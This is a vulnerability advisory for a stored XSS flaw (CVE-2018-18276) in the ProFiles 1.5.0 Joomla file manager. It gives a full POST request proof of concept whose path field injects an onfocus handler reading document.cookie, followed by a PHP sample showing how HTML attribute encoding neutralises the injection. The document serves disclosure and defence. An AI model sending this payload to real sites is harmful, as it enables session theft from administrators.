ProFiles 1.5 component for Joomla Stored XSS vulnerability CVE-2018-18276
Affected Product: ProFiles - Joomla Web Filemanager - 1.5.0 Free Version
Credits: Vulnerability discovered by Claudio Cinquino
Proof of Concept
Affected Component: Create New Folder, parameters name and path
POST /administrator/index.php?option=com_profiles&format=raw&view=rootsandrights HTTP/1.1
Host: x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://x/administrator/index.php?option=com_profiles&format=raw&view=rootsandrights
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Cookie: mtoggleimageview=1; profilesissaved=0; mtableheader=220%2C100%2C100%2C100%2C120%2C80; tooltip=0; mtoggleimageview=0; mtableheader=220%2C100%2C100%2C100%2C120%2C80; filesView=2; 00cb299d45f4b885524ca28e22c3a170=kfsle6nr07anh8d1nh9ijfiio4; b442fd2cca79b1deb66ec5630b09da50=jdbqm7mp74g3q5op4ts6a3tej1
Connection: close
Upgrade-Insecure-Requests: 1

task=&grouptab=&send=1&id=-1&name=test&path=test" autofocus onfocus=alert(document.cookie)>
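The path value in the request above is shaped to close a double-quoted HTML attribute and append an event handler. The PHP below is an added example, not code from the advisory or from ProFiles: it assumes the stored value is later written into the value attribute of an input element (renderUnsafe, renderEscaped and inputAttributes are hypothetical names) and compares the attributes a parser sees with and without output encoding.

```php
<?php
// Constructed sample: the "path" value from the request above.
$storedPath = 'test" autofocus onfocus=alert(document.cookie)>';

// Hypothetical template (not ProFiles code): the stored value is written
// into a double-quoted attribute with no output encoding.
function renderUnsafe(string $value): string
{
    return '<input type="text" name="path" value="' . $value . '">';
}

// Same template, with encoding suited to an HTML attribute context.
// ENT_QUOTES encodes both " and ', so the value cannot end the attribute.
function renderEscaped(string $value): string
{
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="path" value="' . $encoded . '">';
}

// Parse the markup and return the attribute names found on the <input>.
function inputAttributes(string $html): array
{
    libxml_use_internal_errors(true); // keep parser warnings off the output
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    $names = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    foreach ($input->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

$rendered = [
    'unsafe'  => renderUnsafe($storedPath),
    'escaped' => renderEscaped($storedPath),
];
foreach ($rendered as $label => $html) {
    $attrs = inputAttributes($html);
    // Any attribute whose name starts with "on" is an inline event handler.
    $handlers = array_filter($attrs, fn($n) => stripos($n, 'on') === 0);
    printf(
        "%-8s attributes: %s | event handlers: %s\n",
        $label,
        implode(', ', $attrs),
        $handlers ? implode(', ', $handlers) : 'none'
    );
}
```

Because the value is stored, the encoding has to be applied at every place the folder name or path is rendered, not only on the form that accepted it.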